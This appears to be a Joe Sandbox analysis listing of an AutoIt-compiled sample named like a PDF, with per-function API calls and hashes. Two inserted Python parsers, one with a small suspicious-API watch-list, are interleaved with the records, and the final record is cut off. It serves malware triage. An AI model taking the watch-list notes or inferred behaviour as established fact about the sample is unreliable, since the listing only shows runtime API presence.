                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                    • String ID:
                                    • API String ID: 4124339563-0
                                    • Opcode ID: bb648d710f08b852bc663dd4d3b4b57db4909f40797b5a4a00981956b43c9692
                                    • Instruction ID: bf9211890c890488d6b96ceadeb500b0f6008cd6ff8b1662ec8f5f6466015a4d
                                    • Opcode Fuzzy Hash: bb648d710f08b852bc663dd4d3b4b57db4909f40797b5a4a00981956b43c9692
                                    • Instruction Fuzzy Hash: 19A16D72508302FFD7219F64DC08A5BBBADFB89321F004A1AFAE2D61D1D77A94458B52
                                    APIs
                                    • DestroyWindow.USER32(?,?,?), ref: 00FB2CA2
                                    • DeleteObject.GDI32(00000000), ref: 00FB2CE8
                                    • DeleteObject.GDI32(00000000), ref: 00FB2CF3
                                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00FB2CFE
                                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00FB2D09
                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00FEC68B
                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00FEC6C4
                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00FECAED
                                      • Part of subcall function 00FB1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FB2036,?,00000000,?,?,?,?,00FB16CB,00000000,?), ref: 00FB1B9A
                                    • SendMessageW.USER32(?,00001053), ref: 00FECB2A
                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00FECB41
                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FECB57
                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FECB62
                                     Memory Dump Source
                                     • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                    • String ID: 0
                                    • API String ID: 464785882-4108050209
                                    • Opcode ID: 310e3b2ff99d5fd33dc831aee1fe336698f1e0a669c341d036cc4e97c0592882
                                    • Instruction ID: 54311ae28b4899e05760f0511dcc6c8ed889a8b9fcd8dfbb22d476fb113f01eb
                                    • Opcode Fuzzy Hash: 310e3b2ff99d5fd33dc831aee1fe336698f1e0a669c341d036cc4e97c0592882
                                    • Instruction Fuzzy Hash: 4E12BE70A00242EFCB65CF26C884BA9BBE5BF45320F544569F985DB262C735EC42EF91
                                    APIs
                                    • DestroyWindow.USER32(00000000), ref: 010277F1
                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 010278B0
                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 010278EE
                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 01027900
                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 01027946
                                    • GetClientRect.USER32(00000000,?), ref: 01027952
                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 01027996
                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 010279A5
                                    • GetStockObject.GDI32(00000011), ref: 010279B5
                                    • SelectObject.GDI32(00000000,00000000), ref: 010279B9
                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 010279C9
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 010279D2
                                    • DeleteDC.GDI32(00000000), ref: 010279DB
                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 01027A07
                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 01027A1E
                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 01027A59
                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 01027A6D
                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 01027A7E
                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 01027AAE
                                    • GetStockObject.GDI32(00000011), ref: 01027AB9
                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 01027AC4
                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 01027ACE
                                     Memory Dump Source
                                     • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                    • API String ID: 2910397461-517079104
                                    • Opcode ID: 08be7cfccd37820500e9cb5221378453aa4b8ec58ef7e5e5fc5b93ac75fd3a21
                                    • Instruction ID: 2d46fb61065c92d24f6b66cfde97dbf38802158487eb13f038f280f569f51dc4
                                    • Opcode Fuzzy Hash: 08be7cfccd37820500e9cb5221378453aa4b8ec58ef7e5e5fc5b93ac75fd3a21
                                    • Instruction Fuzzy Hash: A9A170B1A40615BFEB24DBA5DC4AFAE7BBDEB44710F004104FA55A72D0CBB9AD01CB60
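The records on this page are per-function listings from the sandbox's IDA export. The "AutoIt v3" window class, the progress-bar and splash-image window builders, and the RunAs-, BlockInput- and DriveGetType-style call sites are consistent with the AutoIt interpreter the report says this binary was compiled with, so an API showing up here means the bundled runtime carries that feature, not that the embedded script calls it. To get these records into something scriptable, the following is an added example (not Joe Sandbox or AutoIt code): it parses the repeated APIs / Memory Dump Source / Similarity blocks into dicts and runs a small API watch-list over them. The sample text is constructed from lines on this page (one abridged record copied verbatim and one composite assembled only to exercise the subcall and no-argument parsing paths); the WATCHLIST notes and the AutoIt built-in names attached to them are my assumptions.

```python
"""Parse the per-function records of a Joe Sandbox export (the repeated
APIs / Memory Dump Source / Similarity blocks) and run an API watch-list over
them.  Added example; not Joe Sandbox or AutoIt code."""
import re

# Constructed sample built from lines on this page: one abridged record copied
# verbatim, then one composite (not a real function) that only exists to
# exercise the subcall and no-argument parsing paths.
SAMPLE = r"""
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,010088D1), ref: 01008CB3
Memory Dump Source
• Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
• Instruction Fuzzy Hash: 16D05E3226450EABEF018EA8DC01EAE3B69EB04B01F408111FE15C5090C776D835AF60
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0101AF89
• GetDriveTypeW.KERNEL32(?,0103FAC0,?,\\.\,0103F910), ref: 0101B066
• DestroyWindow.USER32 ref: 01027B90
  • Part of subcall function 0103AB60: GetSysColor.USER32(00000012), ref: 0103AB99
Memory Dump Source
• Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$PhysicalDrive$\\.\$iSCSI
• API String ID: 2907320926-4222207086
• Instruction Fuzzy Hash: composite
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
LIST_KEYS = ("API ID", "String ID")           # '$'-joined lists in the Similarity block
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")


def _new_record():
    return {"apis": [], "source": None, "associated": [], "API ID": [], "String ID": []}


def parse_records(text):
    """One dict per function; a record ends at its 'Instruction Fuzzy Hash' entry."""
    records, rec, section = [], _new_record(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            continue
        if not line.startswith("•"):          # blank line or stray page text
            continue
        entry = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(entry)
            if m:                             # lines the regex cannot read are skipped, not guessed
                rec["apis"].append({"name": m["name"], "module": m["module"], "ref": m["ref"],
                                    "args": m["args"].split(",") if m["args"] else [],
                                    "subcall_of": m["sub"]})
            continue
        key, _, value = entry.partition(":")
        key, value = key.strip(), value.strip()
        if key == "Source File":
            rec["source"] = value
        elif key == "Associated":
            rec["associated"].append(value)
        elif key in LIST_KEYS:                # a leading lone '$' yields an empty item; drop it
            rec[key] = [s for s in value.split("$") if s.strip()]
        else:
            rec[key] = value
        if key == "Instruction Fuzzy Hash":
            records.append(rec)
            rec = _new_record()
    if rec["apis"] or rec["source"]:          # record cut off by the end of the text
        records.append(rec)
    return records


# Watch-list (my assumption, not part of the report): direct calls that deserve a
# look in a dropper, with the AutoIt built-in each call site is consistent with.
# A compiled AutoIt binary ships the whole interpreter, so an API being present
# shows the runtime offers the feature, not that the embedded script uses it.
WATCHLIST = {
    "BlockInput": "blocks keyboard/mouse input (AutoIt BlockInput); report lists it as a debugging hindrance",
    "LogonUserW": "logs on with explicit credentials (AutoIt RunAs)",
    "GetUserNameW": "reads the current user name (AutoIt @UserName)",
    "GetDriveTypeW": "classifies drives (AutoIt DriveGetType)",
}


def triage(records):
    """(ref, api, note) for every direct watch-listed call, in report order."""
    return [(api["ref"], api["name"], WATCHLIST[api["name"]])
            for rec in records for api in rec["apis"]
            if api["name"] in WATCHLIST and api["subcall_of"] is None]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        print(r.get("API String ID"), [a["name"] for a in r["apis"]], r["String ID"])
    for ref, api, note in triage(recs):
        print(f"  {ref}  {api:<16} {note}")
```

Run it as a script to print the parsed records and the watch-list hits; pass the text export of a whole report instead of SAMPLE to triage every function. Subcall entries ("Part of subcall function ...") are kept in the record but excluded from hits, since they describe a callee rather than the function itself.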
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 0101AF89
                                    • GetDriveTypeW.KERNEL32(?,0103FAC0,?,\\.\,0103F910), ref: 0101B066
                                    • SetErrorMode.KERNEL32(00000000,0103FAC0,?,\\.\,0103F910), ref: 0101B1C4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ErrorMode$DriveType
                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                    • API String ID: 2907320926-4222207086
                                    • Opcode ID: ee174a3e976c18f136cc24cb04863d132ee8c8e203e51fca89c2d5627a29d1d7
                                    • Instruction ID: 67aeecf4daff7ef7073c9ff7424fafef3fafbe5ac436c6bd2e7281b2bd194a76
                                    • Opcode Fuzzy Hash: ee174a3e976c18f136cc24cb04863d132ee8c8e203e51fca89c2d5627a29d1d7
                                    • Instruction Fuzzy Hash: 5E51BF30784305EB8B10EB26CD92DBC77B8BB54685B514059F8CBBB258C77DAD41DB42
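Once a Joe Sandbox function table has been flattened to text like this, a report holds hundreds of such records and a plain grep for an API name loses the record boundaries: which `ref:` address the call sits at, which Opcode ID the function has, which strings it references. The parser below is an added example for this page, not Joe Sandbox code. It reads records in exactly this layout and answers questions such as "which function calls GetDriveTypeW, and where does it sit relative to the dumped image base" or "which record carries the AutoIt v3 GUI string". The layout rules are inferred from the records shown on this page (each record ends with its Instruction Fuzzy Hash line; `$` separates String ID entries; the "Offset:" on the Source File line is taken to be the dump's load address, which is an assumption based on the call-site addresses being above it). SAMPLE is a constructed input: the GetDriveTypeW record from this page, followed by a second record assembled from API lines of two other records so that the argument-less and "Part of subcall" line forms are exercised; the "Download File" link caption fused onto the Associated line is reproduced as the raw export emits it.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample in the listing's own layout: the GetDriveTypeW record from this page,
# then a record assembled from API lines of two other records (argument-less and "Part of
# subcall" forms). The "Associated:" line keeps the fused "Download File" link caption.
SAMPLE = r"""APIs
• SetErrorMode.KERNEL32(00000001), ref: 0101AF89
• GetDriveTypeW.KERNEL32(?,0103FAC0,?,\\.\,0103F910), ref: 0101B066
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$Fixed$Network$PhysicalDrive$RAMDisk$Removable$USB$\\.\$iSCSI
• Opcode ID: ee174a3e976c18f136cc24cb04863d132ee8c8e203e51fca89c2d5627a29d1d7
• Opcode Fuzzy Hash: ee174a3e976c18f136cc24cb04863d132ee8c8e203e51fca89c2d5627a29d1d7
• Instruction Fuzzy Hash: 5E51BF30784305EB8B10EB26CD92DBC77B8BB54685B514059F8CBBB258C77DAD41DB42
APIs
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00FB297C
  • Part of subcall function 00FB2344: GetCursorPos.USER32(?), ref: 00FB2357
• GetDesktopWindow.USER32 ref: 01034C66
Similarity
• String ID: AutoIt v3 GUI
• Opcode ID: b9c79da141e16552adb860468f8c434b77849c6f67b583df90a39afce946da85
• Instruction Fuzzy Hash: 88B18E71A0020AEFDB24DFA9D845BED7BB8FB08310F108219FA56E6294DB39D801DF51
"""

LINK_TEXT = "Download File"
# "• Name.MODULE(args), ref: VA" or "• Name.MODULE ref: VA", optionally prefixed with
# "Part of subcall function VA: " when the listing attributes the call to a callee.
API_RE = re.compile(r"^• (?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
                    r"(?P<name>[\w@?]+)\.(?P<mod>\w+)(?:\((?P<args>.*)\),)? ref: (?P<ref>[0-9A-F]+)$")
KV_RE = re.compile(r"^• (?P<key>[A-Za-z ]+): (?P<value>.*)$")
SOURCE_RE = re.compile(r"^(?P<file>\S+), Offset: (?P<base>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str                          # VA of the call site
    subcall_of: Optional[str] = None  # VA of the callee for "Part of subcall" lines

@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    associated: List[str] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)    # String ID split on "$"
    image_base: int = 0    # "Offset:" of the Source File line, assumed to be the dump's load address
    meta: Dict[str, str] = field(default_factory=dict)  # every other "• Key: value" verbatim

    @property
    def opcode_id(self) -> str:
        return self.meta.get("Opcode ID", "")

def parse_report(text: str) -> List[FunctionRecord]:
    """Split a flattened listing into records; "Instruction Fuzzy Hash" closes each one."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith("•"):   # blank lines and section labels (APIs, Strings, ...)
            continue
        if m := API_RE.match(line):
            args = m["args"].split(",") if m["args"] else []
            cur.apis.append(ApiCall(m["name"], m["mod"], args, m["ref"], m["sub"]))
        elif m := KV_RE.match(line):
            key, value = m["key"], m["value"]
            if key == "Source File":
                s = SOURCE_RE.match(value)
                if not s:
                    raise ValueError(f"bad Source File line: {value!r}")
                cur.meta[key], cur.image_base = s["file"], int(s["base"], 16)
            elif key == "Associated":   # strip the fused link caption
                cur.associated.append(value[:-len(LINK_TEXT)] if value.endswith(LINK_TEXT) else value)
            elif key == "String ID":    # caveat: a string that itself contains "$" is split too
                cur.strings = value.split("$") if value else []
            else:
                cur.meta[key] = value
                if key == "Instruction Fuzzy Hash":
                    records.append(cur)
                    cur = FunctionRecord()
        else:
            raise ValueError(f"unrecognised line: {line!r}")
    if cur.apis or cur.meta:
        raise ValueError("listing ends inside a record (truncated export?)")
    return records

def callers_of(records, api_name, include_subcalls=False) -> List[Tuple[str, str]]:
    """(call-site VA, opcode ID) for each call to api_name; subcall lines only on request."""
    return [(c.ref, r.opcode_id) for r in records for c in r.apis
            if c.name == api_name and (include_subcalls or c.subcall_of is None)]

def records_with_string(records, needle) -> List[str]:
    return [r.opcode_id for r in records if any(needle in s for s in r.strings)]

def rva(record, ref) -> int:   # image-relative offset of a listed VA, for locating it in the dumped PE
    return int(ref, 16) - record.image_base
```

`parse_report` refuses a listing that ends inside a record, which is what a truncated export (like the final record of this page) looks like, rather than silently returning a half-filled record. Subcall lines are kept but flagged with the callee address, so a query for direct callers does not attribute a callee's API to its caller.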
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                    • API String ID: 1038674560-86951937
                                    • Opcode ID: 2e5d301f58b4b5aad41013040db26d96fdd9e6bd3b186880cb9fc36199703413
                                    • Instruction ID: ed18e149195c96a43263a21befff7137daa87dedbae1a69b9b733c02a66410f0
                                    • Opcode Fuzzy Hash: 2e5d301f58b4b5aad41013040db26d96fdd9e6bd3b186880cb9fc36199703413
                                    • Instruction Fuzzy Hash: C9813B71B00242BBCB24BB22DC82FEA776DAF54710F044026F941EA195EB6CDA45FA51
                                    APIs
                                    • GetSysColor.USER32(00000012), ref: 0103AB99
                                    • SetTextColor.GDI32(?,?), ref: 0103AB9D
                                    • GetSysColorBrush.USER32(0000000F), ref: 0103ABB3
                                    • GetSysColor.USER32(0000000F), ref: 0103ABBE
                                    • CreateSolidBrush.GDI32(?), ref: 0103ABC3
                                    • GetSysColor.USER32(00000011), ref: 0103ABDB
                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0103ABE9
                                    • SelectObject.GDI32(?,00000000), ref: 0103ABFA
                                    • SetBkColor.GDI32(?,00000000), ref: 0103AC03
                                    • SelectObject.GDI32(?,?), ref: 0103AC10
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0103AC2F
                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0103AC46
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0103AC5B
                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0103ACA7
                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0103ACCE
                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0103ACEC
                                    • DrawFocusRect.USER32(?,?), ref: 0103ACF7
                                    • GetSysColor.USER32(00000011), ref: 0103AD05
                                    • SetTextColor.GDI32(?,00000000), ref: 0103AD0D
                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0103AD21
                                    • SelectObject.GDI32(?,0103A869), ref: 0103AD38
                                    • DeleteObject.GDI32(?), ref: 0103AD43
                                    • SelectObject.GDI32(?,?), ref: 0103AD49
                                    • DeleteObject.GDI32(?), ref: 0103AD4E
                                    • SetTextColor.GDI32(?,?), ref: 0103AD54
                                    • SetBkColor.GDI32(?,?), ref: 0103AD5E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                    • String ID:
                                    • API String ID: 1996641542-0
                                    • Opcode ID: f7cbeffc7fe7f3e92fa70f44c4e734a65ca0176c01b172f0c3bcffedd7cfcdf4
                                    • Instruction ID: d94b1b92a7bb591ee5609d1ccaf9cbd4353f61050799033ba3644c42759bedb3
                                    • Opcode Fuzzy Hash: f7cbeffc7fe7f3e92fa70f44c4e734a65ca0176c01b172f0c3bcffedd7cfcdf4
                                    • Instruction Fuzzy Hash: 92617F71D00219FFDB219FA8DC48EAE7BBDFB48320F104515FA91AB291D7769940DB90
                                    APIs
                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 01038D34
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01038D45
                                    • CharNextW.USER32(0000014E), ref: 01038D74
                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 01038DB5
                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 01038DCB
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01038DDC
                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 01038DF9
                                    • SetWindowTextW.USER32(?,0000014E), ref: 01038E45
                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 01038E5B
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 01038E8C
                                    • _memset.LIBCMT ref: 01038EB1
                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 01038EFA
                                    • _memset.LIBCMT ref: 01038F59
                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 01038F83
                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 01038FDB
                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 01039088
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 010390AA
                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 010390F4
                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01039121
                                    • DrawMenuBar.USER32(?), ref: 01039130
                                    • SetWindowTextW.USER32(?,0000014E), ref: 01039158
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                    • String ID: 0
                                    • API String ID: 1073566785-4108050209
                                    • Opcode ID: 96caa10bf51a71a011aa650534aacd68813ca4609e1a56303dbdeadd9e87be9c
                                    • Instruction ID: 06f05ba393b1159dce663182535c3e6d6f9ce5d232c5de84f420fc269e58b676
                                    • Opcode Fuzzy Hash: 96caa10bf51a71a011aa650534aacd68813ca4609e1a56303dbdeadd9e87be9c
                                    • Instruction Fuzzy Hash: 19E1B470900209AFDF209F64CC88EEE7BBDFF45714F00829AFA95AA290D7758645DF61
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 01034C51
                                    • GetDesktopWindow.USER32 ref: 01034C66
                                    • GetWindowRect.USER32(00000000), ref: 01034C6D
                                    • GetWindowLongW.USER32(?,000000F0), ref: 01034CCF
                                    • DestroyWindow.USER32(?), ref: 01034CFB
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 01034D24
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01034D42
                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 01034D68
                                    • SendMessageW.USER32(?,00000421,?,?), ref: 01034D7D
                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 01034D90
                                    • IsWindowVisible.USER32(?), ref: 01034DB0
                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 01034DCB
                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 01034DDF
                                    • GetWindowRect.USER32(?,?), ref: 01034DF7
                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 01034E1D
                                    • GetMonitorInfoW.USER32(00000000,?), ref: 01034E37
                                    • CopyRect.USER32(?,?), ref: 01034E4E
                                    • SendMessageW.USER32(?,00000412,00000000), ref: 01034EB9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                    • String ID: ($0$tooltips_class32
                                    • API String ID: 698492251-4156429822
                                    • Opcode ID: 5045647211aa7cb0a836a4f67bdb2543e30bb319f29f94bc7dc58c3fe3fb3fb8
